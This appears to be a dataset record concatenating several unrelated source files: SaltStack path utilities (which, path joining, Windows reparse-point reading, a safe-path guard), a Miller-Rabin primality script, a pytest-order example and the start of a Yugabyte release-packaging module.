            16384  # out buffer size (MAXIMUM_REPARSE_DATA_BUFFER_SIZE)
        )
    finally:
        if fileHandle:
            win32file.CloseHandle(fileHandle)

    return reparseData
@jinja_filter('which')
def which(exe=None):
    '''
    Python clone of /usr/bin/which

    exe
        Name (or path) of the executable to locate.

    Returns the first matching executable path found on the search path,
    or ``None`` when nothing matches (or ``exe`` is falsy).
    '''
    def _is_executable_file_or_link(exe):
        # check for os.X_OK doesn't suffice because directory may executable
        return (os.access(exe, os.X_OK) and
                (os.path.isfile(exe) or os.path.islink(exe)))

    if exe:
        if _is_executable_file_or_link(exe):
            # executable in cwd or fullpath
            return exe

        # Candidate Windows executable extensions (';'-separated PATHEXT).
        ext_list = salt.utils.stringutils.to_str(
            os.environ.get('PATHEXT', str('.EXE'))
        ).split(str(';'))

        @real_memoize
        def _exe_has_ext():
            '''
            Do a case insensitive test if exe has a file extension match in
            PATHEXT
            '''
            for ext in ext_list:
                try:
                    pattern = r'.*\.{0}$'.format(
                        salt.utils.stringutils.to_unicode(ext).lstrip('.')
                    )
                    # .groups() raises AttributeError when re.match returns
                    # None, which is how a non-matching extension is skipped.
                    re.match(
                        pattern,
                        salt.utils.stringutils.to_unicode(exe),
                        re.I).groups()
                    return True
                except AttributeError:
                    continue
            return False

        # Enhance POSIX path for the reliability at some environments, when $PATH is changing
        # This also keeps order, where 'first came, first win' for cases to find optional alternatives
        system_path = salt.utils.stringutils.to_unicode(os.environ.get('PATH', ''))
        search_path = system_path.split(os.pathsep)
        if not salt.utils.platform.is_windows():
            # Always consider the standard *nix binary directories, even when
            # they are missing from $PATH.
            search_path.extend([
                x for x in ('/bin', '/sbin', '/usr/bin',
                            '/usr/sbin', '/usr/local/bin')
                if x not in search_path
            ])
        for path in search_path:
            full_path = join(path, exe)
            if _is_executable_file_or_link(full_path):
                return full_path
            elif salt.utils.platform.is_windows() and not _exe_has_ext():
                # On Windows, check for any extensions in PATHEXT.
                # Allows both 'cmd' and 'cmd.exe' to be matched.
                for ext in ext_list:
                    # Windows filesystem is case insensitive so we
                    # safely rely on that behavior
                    if _is_executable_file_or_link(full_path + ext):
                        return full_path + ext
        log.trace(
            '\'%s\' could not be found in the following search path: \'%s\'',
            exe, search_path
        )
    else:
        log.error('No executable was passed to be searched by salt.utils.path.which()')

    return None
def which_bin(exes):
    '''
    Return the first executable from *exes* that resolves on the system
    path, or None when nothing matches (or *exes* is not iterable).
    '''
    if not isinstance(exes, Iterable):
        return None
    for candidate in exes:
        resolved = which(candidate)
        if resolved:
            return resolved
    return None
@jinja_filter('path_join')
def join(*parts, **kwargs):
    '''
    This functions tries to solve some issues when joining multiple absolute
    paths on both *nix and windows platforms.

    See tests/unit/utils/path_join_test.py for some examples on what's being
    talked about here.

    The "use_posixpath" kwarg can be be used to force joining using poxixpath,
    which is useful for Salt fileserver paths on Windows masters.
    '''
    if six.PY3:
        # Normalize every part to str (PY3 native strings) up front.
        new_parts = []
        for part in parts:
            new_parts.append(salt.utils.stringutils.to_str(part))
        parts = new_parts

    kwargs = salt.utils.args.clean_kwargs(**kwargs)
    use_posixpath = kwargs.pop('use_posixpath', False)
    if kwargs:
        salt.utils.args.invalid_kwargs(kwargs)

    pathlib = posixpath if use_posixpath else os.path

    # Normalize path converting any os.sep as needed
    parts = [pathlib.normpath(p) for p in parts]

    try:
        root = parts.pop(0)
    except IndexError:
        # No args passed to func
        return ''

    root = salt.utils.stringutils.to_unicode(root)
    if not parts:
        ret = root
    else:
        # Strip leading separators so the later parts never reset the root.
        stripped = [p.lstrip(os.sep) for p in parts]
        # NOTE(review): salt.utils.data is not imported at the top of this
        # module -- presumably available as a side effect of another
        # salt.utils import; verify before refactoring the imports.
        ret = pathlib.join(root, *salt.utils.data.decode(stripped))
    return pathlib.normpath(ret)
def check_or_die(command):
    '''
    Convenience helper for modules: raise CommandNotFoundError unless
    *command* can be resolved on the system path.

    Lazily import `salt.modules.cmdmod` to avoid any sort of circular
    dependencies.
    '''
    if command is None:
        raise CommandNotFoundError('\'None\' is not a valid command.')

    found = which(command)
    if not found:
        raise CommandNotFoundError('\'{0}\' is not in the path'.format(command))
def sanitize_win_path(winpath):
    '''
    Remove illegal path characters for windows

    Replaces each of ``<>:|?*`` with an underscore. Non-string input is
    returned unchanged.
    '''
    intab = '<>:|?*'
    if isinstance(winpath, six.text_type):
        # Unicode strings: translate via an {ord: replacement} mapping.
        winpath = winpath.translate(dict((ord(c), '_') for c in intab))
    elif isinstance(winpath, six.string_types):
        # PY2 byte strings need a maketrans translation table instead.
        outtab = '_' * len(intab)
        trantab = ''.maketrans(intab, outtab) if six.PY3 else string.maketrans(intab, outtab)  # pylint: disable=no-member
        winpath = winpath.translate(trantab)
    return winpath
def safe_path(path, allow_path=None):
    r'''
    .. versionadded:: 2017.7.3

    Checks that the path is safe for modification by Salt. For example, you
    wouldn't want to have salt delete the contents of ``C:\Windows``. The
    following directories are considered unsafe:

    - C:\, D:\, E:\, etc.
    - \
    - C:\Windows

    Args:
        path (str): The path to check

        allow_path (str, list): A directory or list of directories inside of
            path that may be safe. For example: ``C:\Windows\TEMP``

    Returns:
        bool: True if safe, otherwise False
    '''
    # Create regex definitions for directories that may be unsafe to modify
    system_root = os.environ.get('SystemRoot', 'C:\\Windows')
    deny_paths = (
        r'[a-z]\:\\$',  # C:\, D:\, etc
        r'\\$',  # \
        re.escape(system_root)  # C:\Windows
    )

    # Make allow_path a list
    if allow_path and not isinstance(allow_path, list):
        allow_path = [allow_path]

    # Create regex definition for directories we may want to make exceptions for
    allow_paths = list()
    if allow_path:
        for item in allow_path:
            allow_paths.append(re.escape(item))

    # Check the path to make sure it's not one of the bad paths
    good_path = True
    for d_path in deny_paths:
        if re.match(d_path, path, flags=re.IGNORECASE) is not None:
            # Found deny path -- no need to test further patterns
            good_path = False
            break

    # If local_dest is one of the bad paths, check for exceptions
    if not good_path:
        for a_path in allow_paths:
            if re.match(a_path, path, flags=re.IGNORECASE) is not None:
                # Found exception -- no need to test further patterns
                good_path = True
                break

    return good_path
def os_walk(top, *args, **kwargs):
    '''
    This is a helper than ensures that all paths returned from os.walk are
    unicode.
    '''
    # On PY2/Windows the path is passed through untouched; elsewhere it is
    # normalized to a native str before walking.
    if six.PY2 and salt.utils.platform.is_windows():
        top_query = top
    else:
        top_query = salt.utils.stringutils.to_str(top)
    for item in os.walk(top_query, *args, **kwargs):
        # Decode each (dirpath, dirnames, filenames) tuple back to unicode.
        # NOTE(review): relies on salt.utils.data being importable although it
        # is not imported at the top of this module -- verify.
        yield salt.utils.data.decode(item, preserve_tuples=True)
|
# -*- coding: utf-8 -*-
'''
Platform independent versions of some os/os.path functions. Gets around PY2's
lack of support for reading NTFS links.
'''
# Import python libs
from __future__ import absolute_import, print_function, unicode_literals
try:
from collections.abc import Iterable
except ImportError:
from collections import Iterable
import errno
import logging
import os
import posixpath
import re
import string
import struct
# Import Salt libs
import salt.utils.args
import salt.utils.platform
import salt.utils.stringutils
from salt.exceptions import CommandNotFoundError
from salt.utils.decorators import memoize as real_memoize
from salt.utils.decorators.jinja import jinja_filter
# Import 3rd-party libs
from salt.ext import six
try:
import win32file
from pywintypes import error as pywinerror
HAS_WIN32FILE = True
except ImportError:
HAS_WIN32FILE = False
log = logging.getLogger(__name__)
def islink(path):
'''
Equivalent to os.path.islink()
'''
if six.PY3 or not salt.utils.platform.is_windows():
return os.path.islink(path)
if not HAS_WIN32FILE:
log.error('Cannot check if %s is a link, missing required modules', path)
if not _is_reparse_point(path):
return False
# check that it is a symlink reparse point (in case it is something else,
# like a mount point)
reparse_data = _get_reparse_data(path)
# sanity check - this should not happen
if not reparse_data:
# not a reparse point
return False
# REPARSE_DATA_BUFFER structure - see
# http://msdn.microsoft.com/en-us/library/ff552012.aspx
# parse the structure header to work out which type of reparse point this is
header_parser = struct.Struct('L')
ReparseTag, = header_parser.unpack(reparse_data[:header_parser.size])
# http://msdn.microsoft.com/en-us/library/windows/desktop/aa365511.aspx
if not ReparseTag & 0xA000FFFF == 0xA000000C:
return False
else:
return True
def readlink(path):
'''
Equivalent to os.readlink()
'''
if six.PY3 or not salt.utils.platform.is_windows():
return os.readlink(path)
if not HAS_WIN32FILE:
log.error('Cannot read %s, missing required modules', path)
reparse_data = _get_reparse_data(path)
if not reparse_data:
# Reproduce *NIX behavior when os.readlink is performed on a path that
# is not a symbolic link.
raise OSError(errno.EINVAL, 'Invalid argument: \'{0}\''.format(path))
# REPARSE_DATA_BUFFER structure - see
# http://msdn.microsoft.com/en-us/library/ff552012.aspx
# parse the structure header to work out which type of reparse point this is
header_parser = struct.Struct('L')
ReparseTag, = header_parser.unpack(reparse_data[:header_parser.size])
# http://msdn.microsoft.com/en-us/library/windows/desktop/aa365511.aspx
if not ReparseTag & 0xA000FFFF == 0xA000000C:
raise OSError(
errno.EINVAL,
'{0} is not a symlink, but another type of reparse point '
'(0x{0:X}).'.format(ReparseTag)
)
# parse as a symlink reparse point structure (the structure for other
# reparse points is different)
data_parser = struct.Struct('LHHHHHHL')
ReparseTag, ReparseDataLength, Reserved, SubstituteNameOffset, \
SubstituteNameLength, PrintNameOffset, \
PrintNameLength, Flags = data_parser.unpack(reparse_data[:data_parser.size])
path_buffer_offset = data_parser.size
absolute_substitute_name_offset = path_buffer_offset + SubstituteNameOffset
target_bytes = reparse_data[absolute_substitute_name_offset:absolute_substitute_name_offset+SubstituteNameLength]
target = target_bytes.decode('UTF-16')
if target.startswith('\\??\\'):
target = target[4:]
try:
# comes out in 8.3 form; convert it to LFN to make it look nicer
target = win32file.GetLongPathName(target)
except pywinerror as exc:
# If target is on a UNC share, the decoded target will be in the format
# "UNC\hostanme\sharename\additional\subdirs\under\share". So, in
# these cases, return the target path in the proper UNC path format.
if target.startswith('UNC\\'):
return re.sub(r'^UNC\\+', r'\\\\', target)
# if file is not found (i.e. bad symlink), return it anyway like on *nix
if exc.winerror == 2:
return target
raise
return target
def _is_reparse_point(path):
    '''
    Returns True if path is a reparse point; False otherwise.

    A reparse point is indicated by FILE_ATTRIBUTE_REPARSE_POINT (0x400)
    in the file's attribute bitmask. ``GetFileAttributesW`` returns -1
    (INVALID_FILE_ATTRIBUTES) when the path cannot be queried, which is
    treated as "not a reparse point".
    '''
    result = win32file.GetFileAttributesW(path)
    if result == -1:
        return False
    # bool() instead of `True if ... else False` -- same result, idiomatic.
    return bool(result & 0x400)
def _get_reparse_data(path):
'''
Retrieves the reparse point data structure for the given path.
If the path is not a reparse point, None is returned.
See http://msdn.microsoft.com/en-us/library/ff552012.aspx for details on the
REPARSE_DATA_BUFFER structure returned.
'''
# ensure paths are using the right slashes
path = os.path.normpath(path)
if not _is_reparse_point(path):
return None
fileHandle = None
try:
fileHandle = win32file.CreateFileW(
path,
0x80000000, # GENERIC_READ
1, # share with other readers
None, # no inherit, default security descriptor
3, # OPEN_EXISTING
0x00200000 | 0x02000000 # FILE_FLAG_OPEN_REPARSE_POINT | FILE_FLAG_BACKUP_SEMANTICS
)
reparseData = win32file.DeviceIoControl(
fileHandle,
0x900a8, # FSCTL_GET_REPARSE_POINT
None, # in buffer
16384 # out buffer size (MAXIMUM_REPARSE_DATA_BUFFER_SIZE)
)
finally:
if fileHandle:
win32file.CloseHandle(fileHandle)
return reparseData
@jinja_filter('which')
def which(exe=None):
'''
Python clone of /usr/bin/which
'''
def _is_executable_file_or_link(exe):
# check for os.X_OK doesn't suffice because directory may executable
return (os.access(exe, os.X_OK) and
(os.path.isfile(exe) or os.path.islink(exe)))
if exe:
if _is_executable_file_or_link(exe):
# executable in cwd or fullpath
return exe
ext_list = salt.utils.stringutils.to_str(
os.environ.get('PATHEXT', str('.EXE'))
).split(str(';'))
@real_memoize
def _exe_has_ext():
'''
Do a case insensitive test if exe has a file extension match in
PATHEXT
'''
for ext in ext_list:
try:
pattern = r'.*\.{0}$'.format(
salt.utils.stringutils.to_unicode(ext).lstrip('.')
)
re.match(
pattern,
salt.utils.stringutils.to_unicode(exe),
re.I).groups()
return True
except AttributeError:
continue
return False
# Enhance POSIX path for the reliability at some environments, when $PATH is changing
# This also keeps order, where 'first came, first win' for cases to find optional alternatives
system_path = salt.utils.stringutils.to_unicode(os.environ.get('PATH', ''))
search_path = system_path.split(os.pathsep)
if not salt.utils.platform.is_windows():
search_path.extend([
x for x in ('/bin', '/sbin', '/usr/bin',
'/usr/sbin', '/usr/local/bin')
if x not in search_path
])
for path in search_path:
full_path = join(path, exe)
if _is_executable_file_or_link(full_path):
return full_path
elif salt.utils.platform.is_windows() and not _exe_has_ext():
# On Windows, check for any extensions in PATHEXT.
# Allows both 'cmd' and 'cmd.exe' to be matched.
for ext in ext_list:
# Windows filesystem is case insensitive so we
# safely rely on that behavior
if _is_executable_file_or_link(full_path + ext):
return full_path + ext
log.trace(
'\'%s\' could not be found in the following search path: \'%s\'',
exe, search_path
)
else:
log.error('No executable was passed to be searched by salt.utils.path.which()')
return None
def which_bin(exes):
    '''
    Return the first executable from *exes* that resolves on the system
    path, or None when nothing matches (or *exes* is not iterable).
    '''
    if not isinstance(exes, Iterable):
        return None
    for candidate in exes:
        resolved = which(candidate)
        if resolved:
            return resolved
    return None
@jinja_filter('path_join')
def join(*parts, **kwargs):
'''
This functions tries to solve some issues when joining multiple absolute
paths on both *nix and windows platforms.
See tests/unit/utils/path_join_test.py for some examples on what's being
talked about here.
The "use_posixpath" kwarg can be be used to force joining using poxixpath,
which is useful for Salt fileserver paths on Windows masters.
'''
if six.PY3:
new_parts = []
for part in parts:
new_parts.append(salt.utils.stringutils.to_str(part))
parts = new_parts
kwargs = salt.utils.args.clean_kwargs(**kwargs)
use_posixpath = kwargs.pop('use_posixpath', False)
if kwargs:
salt.utils.args.invalid_kwargs(kwargs)
pathlib = posixpath if use_posixpath else os.path
# Normalize path converting any os.sep as needed
parts = [pathlib.normpath(p) for p in parts]
try:
root = parts.pop(0)
except IndexError:
# No args passed to func
return ''
root = salt.utils.stringutils.to_unicode(root)
if not parts:
ret = root
else:
stripped = [p.lstrip(os.sep) for p in parts]
ret = pathlib.join(root, *salt.utils.data.decode(stripped))
return pathlib.normpath(ret)
def check_or_die(command):
    '''
    Convenience helper for modules: raise CommandNotFoundError unless
    *command* can be resolved on the system path.

    Lazily import `salt.modules.cmdmod` to avoid any sort of circular
    dependencies.
    '''
    if command is None:
        raise CommandNotFoundError('\'None\' is not a valid command.')

    found = which(command)
    if not found:
        raise CommandNotFoundError('\'{0}\' is not in the path'.format(command))
def sanitize_win_path(winpath):
'''
Remove illegal path characters for windows
'''
intab = '<>:|?*'
if isinstance(winpath, six.text_type):
winpath = winpath.translate(dict((ord(c), '_') for c in intab))
elif isinstance(winpath, six.string_types):
outtab = '_' * len(intab)
trantab = ''.maketrans(intab, outtab) if six.PY3 else string.maketrans(intab, outtab) # pylint: disable=no-member
winpath = winpath.translate(trantab)
return winpath
def safe_path(path, allow_path=None):
    r'''
    .. versionadded:: 2017.7.3

    Checks that the path is safe for modification by Salt. For example, you
    wouldn't want to have salt delete the contents of ``C:\Windows``. The
    following directories are considered unsafe:

    - C:\, D:\, E:\, etc.
    - \
    - C:\Windows

    Args:
        path (str): The path to check

        allow_path (str, list): A directory or list of directories inside of
            path that may be safe. For example: ``C:\Windows\TEMP``

    Returns:
        bool: True if safe, otherwise False
    '''
    # Create regex definitions for directories that may be unsafe to modify
    system_root = os.environ.get('SystemRoot', 'C:\\Windows')
    deny_paths = (
        r'[a-z]\:\\$',  # C:\, D:\, etc
        r'\\$',  # \
        re.escape(system_root)  # C:\Windows
    )

    # Make allow_path a list
    if allow_path and not isinstance(allow_path, list):
        allow_path = [allow_path]

    # Create regex definition for directories we may want to make exceptions for
    allow_paths = list()
    if allow_path:
        for item in allow_path:
            allow_paths.append(re.escape(item))

    # Check the path to make sure it's not one of the bad paths
    good_path = True
    for d_path in deny_paths:
        if re.match(d_path, path, flags=re.IGNORECASE) is not None:
            # Found deny path -- no need to test further patterns
            good_path = False
            break

    # If local_dest is one of the bad paths, check for exceptions
    if not good_path:
        for a_path in allow_paths:
            if re.match(a_path, path, flags=re.IGNORECASE) is not None:
                # Found exception -- no need to test further patterns
                good_path = True
                break

    return good_path
def os_walk(top, *args, **kwargs):
'''
This is a helper than ensures that all paths returned from os.walk are
unicode.
'''
if six.PY2 and salt.utils.platform.is_windows():
top_query = top
else:
top_query = salt.utils.stringutils.to_str(top)
for item in os.walk(top_query, *args, **kwargs):
yield salt.utils.data.decode(item, preserve_tuples=True)
|
en
| 0.795688
|
# -*- coding: utf-8 -*- Platform independent versions of some os/os.path functions. Gets around PY2's lack of support for reading NTFS links. # Import python libs # Import Salt libs # Import 3rd-party libs Equivalent to os.path.islink() # check that it is a symlink reparse point (in case it is something else, # like a mount point) # sanity check - this should not happen # not a reparse point # REPARSE_DATA_BUFFER structure - see # http://msdn.microsoft.com/en-us/library/ff552012.aspx # parse the structure header to work out which type of reparse point this is # http://msdn.microsoft.com/en-us/library/windows/desktop/aa365511.aspx Equivalent to os.readlink() # Reproduce *NIX behavior when os.readlink is performed on a path that # is not a symbolic link. # REPARSE_DATA_BUFFER structure - see # http://msdn.microsoft.com/en-us/library/ff552012.aspx # parse the structure header to work out which type of reparse point this is # http://msdn.microsoft.com/en-us/library/windows/desktop/aa365511.aspx # parse as a symlink reparse point structure (the structure for other # reparse points is different) # comes out in 8.3 form; convert it to LFN to make it look nicer # If target is on a UNC share, the decoded target will be in the format # "UNC\hostanme\sharename\additional\subdirs\under\share". So, in # these cases, return the target path in the proper UNC path format. # if file is not found (i.e. bad symlink), return it anyway like on *nix Returns True if path is a reparse point; False otherwise. Retrieves the reparse point data structure for the given path. If the path is not a reparse point, None is returned. See http://msdn.microsoft.com/en-us/library/ff552012.aspx for details on the REPARSE_DATA_BUFFER structure returned. 
# ensure paths are using the right slashes # GENERIC_READ # share with other readers # no inherit, default security descriptor # OPEN_EXISTING # FILE_FLAG_OPEN_REPARSE_POINT | FILE_FLAG_BACKUP_SEMANTICS # FSCTL_GET_REPARSE_POINT # in buffer # out buffer size (MAXIMUM_REPARSE_DATA_BUFFER_SIZE) Python clone of /usr/bin/which # check for os.X_OK doesn't suffice because directory may executable # executable in cwd or fullpath Do a case insensitive test if exe has a file extension match in PATHEXT # Enhance POSIX path for the reliability at some environments, when $PATH is changing # This also keeps order, where 'first came, first win' for cases to find optional alternatives # On Windows, check for any extensions in PATHEXT. # Allows both 'cmd' and 'cmd.exe' to be matched. # Windows filesystem is case insensitive so we # safely rely on that behavior Scan over some possible executables and return the first one that is found This functions tries to solve some issues when joining multiple absolute paths on both *nix and windows platforms. See tests/unit/utils/path_join_test.py for some examples on what's being talked about here. The "use_posixpath" kwarg can be be used to force joining using poxixpath, which is useful for Salt fileserver paths on Windows masters. # Normalize path converting any os.sep as needed # No args passed to func Simple convenience function for modules to use for gracefully blowing up if a required tool is not available in the system path. Lazily import `salt.modules.cmdmod` to avoid any sort of circular dependencies. Remove illegal path characters for windows # pylint: disable=no-member .. versionadded:: 2017.7.3 Checks that the path is safe for modification by Salt. For example, you wouldn't want to have salt delete the contents of ``C:\Windows``. The following directories are considered unsafe: - C:\, D:\, E:\, etc. 
- \ - C:\Windows Args: path (str): The path to check allow_paths (str, list): A directory or list of directories inside of path that may be safe. For example: ``C:\Windows\TEMP`` Returns: bool: True if safe, otherwise False # Create regex definitions for directories that may be unsafe to modify # C:\, D:\, etc # \ # C:\Windows # Make allow_path a list # Create regex definition for directories we may want to make exceptions for # Check the path to make sure it's not one of the bad paths # Found deny path # If local_dest is one of the bad paths, check for exceptions # Found exception This is a helper than ensures that all paths returned from os.walk are unicode.
| 2.359116
| 2
|
Rabin_miller_primality_test.py
|
lokeshh/Information_security_lab
| 7
|
6627594
|
<reponame>lokeshh/Information_security_lab
import random
#Algorithm
#It returns false if n is composite and true if n is probably prime. K is an input parameter that determines accuracy level.
#Higher value of k indicates more accuracy.
#miller test algo
def millertest(d, n):
    """Run one Miller-Rabin witness round against candidate n.

    :param d: odd part of n-1 (i.e. n-1 == d * 2**r for some r >= 1).
    :param n: odd integer to test, n > 4.
    :return: False if the random base proves n composite,
             True if n passes this round (probably prime).
    """
    # Pick a uniform random base a in [2, n-2].  The original
    # 2 + randint(1, 100000) % (n - 4) is biased and can never pick n-2.
    a = random.randrange(2, n - 1)
    # Modular exponentiation: pow(a, d, n) works in O(log d) multiplications,
    # whereas (a ** d) % n first builds an astronomically large integer.
    x = pow(a, d, n)
    if x == 1 or x == n - 1:
        return True
    # Square x repeatedly (d doubling each time) until d reaches n-1.
    while d != n - 1:
        x = (x * x) % n
        d *= 2
        if x == 1:
            return False
        if x == n - 1:
            return True
    return False


def isprime(n, k):
    """Miller-Rabin probabilistic primality test.

    :param n: integer to test.
    :param k: number of independent witness rounds (higher k => lower
              probability of a composite slipping through).
    :return: True if n is probably prime, False if n is composite.
    """
    # Corner cases: n <= 1 and 4 are not prime; 2 and 3 are prime.
    if n <= 1 or n == 4:
        return False
    if n <= 3:
        return True
    # Write n-1 = d * 2^r with d odd.  Integer division keeps d an int;
    # the original 'd /= 2' yields a float under Python 3, which breaks
    # modular exponentiation for large n.
    d = n - 1
    while d % 2 == 0:
        d //= 2
    # Any failed witness round proves n composite.
    for _ in range(k):
        if not millertest(d, n):
            return False
    return True
# main program: read a half-open range [a, b) and print each probable prime.
# Ported to Python 3: print is a function and raw_input() is now input().
k = 4  # number of Miller-Rabin rounds per candidate
print("Enter 2 numbers to find the primes in b/w")
a, b = map(int, input().split())
print("Prime no.'s b/w them are :")
for n in range(a, b):
    if isprime(n, k):
        print(n)
|
import random
#Algorithm
#It returns false if n is composite and true if n is probably prime. K is an input parameter that determines accuracy level.
#Higher value of k indicates more accuracy.
#miller test algo
def millertest(d, n):
    """Run one Miller-Rabin witness round against candidate n.

    :param d: odd part of n-1 (i.e. n-1 == d * 2**r for some r >= 1).
    :param n: odd integer to test, n > 4.
    :return: False if the random base proves n composite,
             True if n passes this round (probably prime).
    """
    # Pick a uniform random base a in [2, n-2].  The original
    # 2 + randint(1, 100000) % (n - 4) is biased and can never pick n-2.
    a = random.randrange(2, n - 1)
    # Modular exponentiation: pow(a, d, n) works in O(log d) multiplications,
    # whereas (a ** d) % n first builds an astronomically large integer.
    x = pow(a, d, n)
    if x == 1 or x == n - 1:
        return True
    # Square x repeatedly (d doubling each time) until d reaches n-1.
    while d != n - 1:
        x = (x * x) % n
        d *= 2
        if x == 1:
            return False
        if x == n - 1:
            return True
    return False


def isprime(n, k):
    """Miller-Rabin probabilistic primality test.

    :param n: integer to test.
    :param k: number of independent witness rounds (higher k => lower
              probability of a composite slipping through).
    :return: True if n is probably prime, False if n is composite.
    """
    # Corner cases: n <= 1 and 4 are not prime; 2 and 3 are prime.
    if n <= 1 or n == 4:
        return False
    if n <= 3:
        return True
    # Write n-1 = d * 2^r with d odd.  Integer division keeps d an int;
    # the original 'd /= 2' yields a float under Python 3, which breaks
    # modular exponentiation for large n.
    d = n - 1
    while d % 2 == 0:
        d //= 2
    # Any failed witness round proves n composite.
    for _ in range(k):
        if not millertest(d, n):
            return False
    return True
# main program: read a half-open range [a, b) and print each probable prime.
# Ported to Python 3: print is a function and raw_input() is now input().
k = 4  # number of Miller-Rabin rounds per candidate
print("Enter 2 numbers to find the primes in b/w")
a, b = map(int, input().split())
print("Prime no.'s b/w them are :")
for n in range(a, b):
    if isprime(n, k):
        print(n)
|
en
| 0.748302
|
#Algorithm #It returns false if n is composite and true if n is probably prime. K is an input parameter that determines accuracy level. #Higher valur of k indicates more accuracy. #miller test algo #pick random no. in [2...n-2] and make sure its >4 #Compute a^d % n #checking if prime #corner cases # Find r such that n = 2^d * r + 1 for some r >= 1 #Iterate given no. k times #return False #main program #no. of iterations
| 3.922358
| 4
|
example/test_ordinal_class_mark.py
|
DevilXD/pytest-order
| 41
|
6627595
|
<reponame>DevilXD/pytest-order
import pytest
@pytest.mark.order(1)
class Test1:
    """Example class for pytest-order: marked order(1), so it should be
    collected to run after the order(0) class even though it is defined
    first in the file."""
    def test_1(self):
        # Trivially passing; only the execution order is of interest here.
        assert True
    def test_2(self):
        assert True
@pytest.mark.order(0)
class Test2:
    """Example class for pytest-order: marked order(0), so it should be
    collected to run before the order(1) class despite being defined
    second in the file."""
    def test_1(self):
        # Trivially passing; only the execution order is of interest here.
        assert True
    def test_2(self):
        assert True
|
import pytest
@pytest.mark.order(1)
class Test1:
    """Example class for pytest-order: marked order(1), so it should be
    collected to run after the order(0) class even though it is defined
    first in the file."""
    def test_1(self):
        # Trivially passing; only the execution order is of interest here.
        assert True
    def test_2(self):
        assert True
@pytest.mark.order(0)
class Test2:
    """Example class for pytest-order: marked order(0), so it should be
    collected to run before the order(1) class despite being defined
    second in the file."""
    def test_1(self):
        # Trivially passing; only the execution order is of interest here.
        assert True
    def test_2(self):
        assert True
|
none
| 1
| 2.453094
| 2
|
|
python/yb/release_util.py
|
def-/yugabyte-db
| 0
|
6627596
|
"""
Copyright (c) Yugabyte, Inc.
This module provides utilities for generating and publishing release.
"""
import glob
import json
import logging
import os
import platform
import shutil
import sys
import re
import distro # type: ignore
from subprocess import call, check_output
from xml.dom import minidom
from yb.command_util import run_program, mkdir_p, copy_deep
from yb.common_util import (
get_thirdparty_dir,
is_macos,
get_compiler_type_from_build_root,
)
from typing import Dict, Any, Optional, cast, List
RELEASE_MANIFEST_NAME = "yb_release_manifest.json"
RELEASE_VERSION_FILE = "version.txt"
THIRDPARTY_PREFIX_RE = re.compile('^thirdparty/(.*)$')
class ReleaseUtil(object):
    """Packages a YugaByte package with the appropriate file naming schema."""

    release_manifest: Dict[str, Any]
    base_version: str
    repository: str
    build_type: str
    distribution_path: str
    force: bool
    commit: str
    build_root: str
    package_name: str

    def __init__(
            self,
            repository: str,
            build_type: str,
            distribution_path: str,
            force: bool,
            commit: Optional[str],
            build_root: str,
            package_name: str) -> None:
        """
        :param repository: the path to YugabyteDB repository (also known as YB_SRC_ROOT).
        :param build_type: build type such as "release".
        :param distribution_path: the directory where to place the resulting archive.
        :param force: whether to skip the prompt in case there are local uncommitted changes.
        :param commit: the Git commit SHA1 to use. If not specified, it is autodetected.
        :param build_root: the build root directory corresponding to the build type.
        :param package_name: the name of the top-level section of yb_release_manifest.json, such
                             as "yugabyte" or "yugabyte-client", specifying the set of files to
                             include.
        """
        self.repo = repository
        self.build_type = build_type
        self.build_path = os.path.join(self.repo, 'build')
        self.distribution_path = distribution_path
        self.force = force
        self.commit = commit or ReleaseUtil.get_head_commit_hash()
        self.package_name = package_name
        base_version = None
        with open(os.path.join(self.repo, RELEASE_VERSION_FILE)) as version_file:
            # Remove any build number in the version.txt.
            base_version = version_file.read().split("-")[0]
        assert base_version is not None, \
            'Unable to read {0} file'.format(RELEASE_VERSION_FILE)
        self.base_version = base_version
        with open(os.path.join(self.repo, RELEASE_MANIFEST_NAME)) as release_manifest_file:
            self.release_manifest = json.load(release_manifest_file)[package_name]
        assert self.release_manifest is not None, \
            'Unable to read {0} file'.format(RELEASE_MANIFEST_NAME)
        self.build_root = build_root
        # The Java project version is needed for ${project.version} expansion.
        pom_file = os.path.join(self.repo, 'java', 'pom.xml')
        self.java_project_version = minidom.parse(pom_file).getElementsByTagName(
            'version')[0].firstChild.nodeValue
        logging.info("Java project version from pom.xml: {}".format(self.java_project_version))
        self._rewrite_manifest()

    def get_release_manifest(self) -> Dict[str, Any]:
        """Return the (already expanded) release manifest for this package."""
        return self.release_manifest

    def get_seed_executable_patterns(self) -> List[str]:
        """Return the glob patterns of executables listed in the 'bin' section."""
        return cast(List[str], self.release_manifest['bin'])

    def expand_value(self, old_value: str) -> str:
        """
        Expand old_value with the following changes:
        - Replace ${project.version} with the Java version from pom.xml.
        - Replace the leading "thirdparty/" with the respective YB_THIRDPARTY_DIR from the build.
        - Replace $BUILD_ROOT with the actual build_root.
        """
        # Substitution for Java.
        new_value = old_value.replace('${project.version}', self.java_project_version)
        # Substitution for thirdparty.
        thirdparty_prefix_match = THIRDPARTY_PREFIX_RE.match(new_value)
        if thirdparty_prefix_match:
            new_value = os.path.join(get_thirdparty_dir(), thirdparty_prefix_match.group(1))
        # Substitution for BUILD_ROOT.
        new_value = new_value.replace("$BUILD_ROOT", self.build_root)
        thirdparty_instrumentation = "uninstrumented"
        new_value = new_value.replace(
            "$THIRDPARTY_BUILD_SPECIFIC_DIR",
            os.path.join(get_thirdparty_dir(), "installed", thirdparty_instrumentation))
        if new_value != old_value:
            logging.info("Substituting '{}' -> '{}' in manifest".format(
                old_value, new_value))
        return new_value

    def _rewrite_manifest(self) -> None:
        """
        Rewrite the release manifest expanding values using expand_value function.
        """
        for key, values in self.release_manifest.items():
            if isinstance(values, dict):
                # Dict-valued sections (e.g. '%symlinks%') map destination -> target.
                for k, v in values.items():
                    values[k] = self.expand_value(v)
            else:
                for i in range(len(values)):
                    values[i] = self.expand_value(values[i])

    def repo_expand_path(self, path: str) -> str:
        """
        If path is relative treat it as a path within repo and make it absolute.
        """
        if not path.startswith('/'):
            path = os.path.join(self.repo, path)
        return path

    def create_distribution(self, distribution_dir: str) -> None:
        """This method would read the release_manifest and traverse through the
        build directory and copy necessary files/symlinks into the distribution_dir
        Args:
            distribution_dir (string): Directory to create the distribution
        """
        for dir_from_manifest in self.release_manifest:
            if dir_from_manifest == '%symlinks%':
                # Symlink entries map link-path -> link-target.
                for dst, target in self.release_manifest[dir_from_manifest].items():
                    dst = os.path.join(distribution_dir, dst)
                    logging.debug("Creating symlink {} -> {}".format(dst, target))
                    mkdir_p(os.path.dirname(dst))
                    os.symlink(target, dst)
                continue
            current_dest_dir = os.path.join(distribution_dir, dir_from_manifest)
            mkdir_p(current_dest_dir)
            for elem in self.release_manifest[dir_from_manifest]:
